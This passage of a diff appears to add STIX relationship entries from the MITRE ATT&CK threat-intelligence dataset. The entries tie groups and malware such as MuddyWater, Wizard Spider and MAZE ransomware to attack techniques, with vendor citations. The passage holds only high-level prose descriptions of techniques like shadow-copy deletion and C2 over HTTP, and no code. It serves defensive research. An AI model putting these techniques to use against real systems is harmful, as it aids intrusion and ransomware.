+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[Sharpshooter](https://attack.mitre.org/groups/G0104) has sent malicious Word OLE documents to victims.(Citation: McAfee Sharpshooter December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--abb78042-19f1-4ddf-82bb-afc67daeeca1",
+ "type": "relationship",
+ "modified": "2020-05-15T17:03:12.918Z",
+ "created": "2020-05-15T17:03:12.918Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used WMI and LDAP queries for network discovery.(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1fa97951-8eba-4771-bc42-8084967f0c65",
+ "type": "relationship",
+ "modified": "2020-05-18T12:52:08.756Z",
+ "created": "2020-05-15T18:52:17.468Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used AdFind.exe to collect information about Active Directory groups and accounts.(Citation: FireEye Ryuk and Trickbot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7af53b3b-0e82-4839-b69a-e47a5001218c",
+ "type": "relationship",
+ "modified": "2020-05-18T12:37:03.945Z",
+ "created": "2020-05-18T12:37:03.945Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "FSecure Lokibot November 2019",
+ "url": "https://www.f-secure.com/v-descs/trojan_w32_lokibot.shtml",
+ "description": "Kazem, M. (2019, November 25). Trojan:W32/Lokibot. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the domain name of the infected host.(Citation: FSecure Lokibot November 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d331f4b3-047a-4418-9611-f2b8445692b3",
+ "type": "relationship",
+ "modified": "2020-05-18T13:38:59.051Z",
+ "created": "2020-05-18T13:38:59.051Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used HTTP for C2 communications.(Citation: ClearSky MuddyWater June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--7700e443-2a26-43ba-9557-4c6f11bfbde1",
+ "type": "relationship",
+ "modified": "2020-05-20T20:37:42.721Z",
+ "created": "2020-05-18T17:29:30.916Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Office vulnerability CVE-2017-0199 for execution.(Citation: ClearSky MuddyWater June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f5e6ce32-60e2-4a2c-8cc9-efb9d613a8e4",
+ "type": "relationship",
+ "modified": "2020-05-20T20:26:59.680Z",
+ "created": "2020-05-18T17:29:30.919Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has injected the malware DLL into a target process.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--44fab50d-4fb6-4a8a-ab7a-84dcb70443f5",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.393Z",
+ "created": "2020-05-18T17:31:39.355Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has forged POST strings with a random choice from a list of possibilities including \"forum\", \"php\", \"view\", etc. while making connection with the C2, hindering detection efforts.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6a521aa4-d389-4ef4-bd24-442d8af23333",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.397Z",
+ "created": "2020-05-18T17:31:39.357Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has communicated to hard-coded IP addresses via HTTP.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9c89cfe5-1a9f-4b2d-82e2-f1638cb13b58",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.395Z",
+ "created": "2020-05-18T17:31:39.359Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has used the \"WNetOpenEnumW\", \"WNetEnumResourceW\u201d, \u201cWNetCloseEnum\u201d and \u201cWNetAddConnection2W\u201d functions to enumerate the network resources on the infected machine.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2f3d9b76-bec9-4cee-9a9b-1c42f373ec86",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.399Z",
+ "created": "2020-05-18T17:31:39.376Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has used the \u201cWow64RevertWow64FsRedirection\u201d function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--cabbe975-9936-4a9a-8fae-a747b3dc7a9d",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.447Z",
+ "created": "2020-05-18T17:31:39.413Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has disabled dynamic analysis and other security tools including IDA debugger, x32dbg, and OllyDbg.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--dc9d4208-5e09-437e-bdd1-0dbfc4b54355",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.443Z",
+ "created": "2020-05-18T17:31:39.464Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "FireEye Maze May 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "The [MAZE](https://attack.mitre.org/software/S0449) encryption process has used batch scripts with various commands.(Citation: FireEye Maze May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a747c7d5-afe9-4120-bb18-f21b5d9bb988",
+ "type": "relationship",
+ "modified": "2020-06-24T01:39:05.802Z",
+ "created": "2020-05-18T17:31:39.469Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has attempted to delete the shadow volumes of infected machines, once before and once after the encryption process.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ea32ebd2-9827-43ec-a3d3-f0148fee8ed8",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.449Z",
+ "created": "2020-05-18T17:31:39.474Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6e4d32b9-923f-46a9-887e-4d4d0687fd1b",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.451Z",
+ "created": "2020-05-18T17:31:39.475Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has used \"wmic.exe\" attempting to delete the shadow volumes on the machine.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--b8ead9c4-0403-4b23-b33f-8ac1c57f8e82",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.456Z",
+ "created": "2020-05-18T17:31:39.477Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has decrypted strings and other important information during the encryption process. [MAZE](https://attack.mitre.org/software/S0449) also calls certain functions dynamically to hinder analysis.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e3864ffa-3348-4791-b979-7d8b2e2151cc",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.454Z",
+ "created": "2020-05-18T17:31:39.482Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has checked the language of the infected system using the \"GetUSerDefaultUILanguage\" function.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0d3f773c-ed0e-4db4-8457-204a7a33eb58",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.453Z",
+ "created": "2020-05-18T17:31:39.484Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has inserted large blocks of junk code, including some components to decrypt strings and other important information for later in the encryption process.(Citation: McAfee Maze March 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0bbdc984-1515-4a8e-a211-2817371fc75e",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.458Z",
+ "created": "2020-05-18T17:31:39.486Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has gathered all of the running system processes.(Citation: McAfee Maze March 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c54e60c1-728d-4211-b309-89f928ae7f0a",
+ "type": "relationship",
+ "modified": "2020-06-24T01:40:07.572Z",
+ "created": "2020-05-18T17:31:39.490Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "external_references": [
+ {
+ "source_name": "FireEye Maze May 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. [MAZE](https://attack.mitre.org/software/S0449) has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.(Citation: FireEye Maze May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--006e029e-0714-4f99-befd-53b9fbc7c8c8",
+ "type": "relationship",
+ "modified": "2020-06-24T01:39:05.871Z",
+ "created": "2020-05-18T17:31:39.583Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has base64 encoded C2 communications.(Citation: ClearSky MuddyWater June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--a1fc4800-c670-4bc1-bc42-2b5fe66d0297",
+ "type": "relationship",
+ "modified": "2020-05-20T20:52:34.253Z",
+ "created": "2020-05-18T17:43:36.737Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21",
+ "external_references": [
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used a Word Template, Normal.dotm, for persistence.(Citation: Reaqta MuddyWater November 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--07af222c-dbd5-4ea4-b94b-a0fe8bdefcee",
+ "type": "relationship",
+ "modified": "2020-05-18T19:04:37.688Z",
+ "created": "2020-05-18T19:04:37.688Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used scheduled tasks to establish persistence.(Citation: Reaqta MuddyWater November 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--c8f3916d-e020-42a8-afe0-25fe8498245a",
+ "type": "relationship",
+ "modified": "2020-05-18T19:04:37.692Z",
+ "created": "2020-05-18T19:04:37.692Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ }
+ ],
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used C2 infrastructure to receive exfiltrated data.(Citation: Reaqta MuddyWater November 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--dfb4c7e9-e1af-4716-b658-9cfbadd706dc",
+ "type": "relationship",
+ "modified": "2020-05-20T20:52:34.280Z",
+ "created": "2020-05-18T19:04:37.694Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+ "target_ref": "tool--c8655260-9f4b-44e3-85e1-6538a5f6e4f4",
+ "external_references": [
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "(Citation: Reaqta MuddyWater November 2017)(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fd119308-f4b9-4d06-adf2-08a76baee7d9",
+ "type": "relationship",
+ "modified": "2020-05-18T19:46:02.257Z",
+ "created": "2020-05-18T19:04:38.065Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) has used get_tasklist to discover processes on the compromised host.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--ff3b4b17-7d3f-43a9-8e9a-ce56909da725",
+ "type": "relationship",
+ "modified": "2020-05-18T19:37:52.273Z",
+ "created": "2020-05-18T19:37:52.273Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
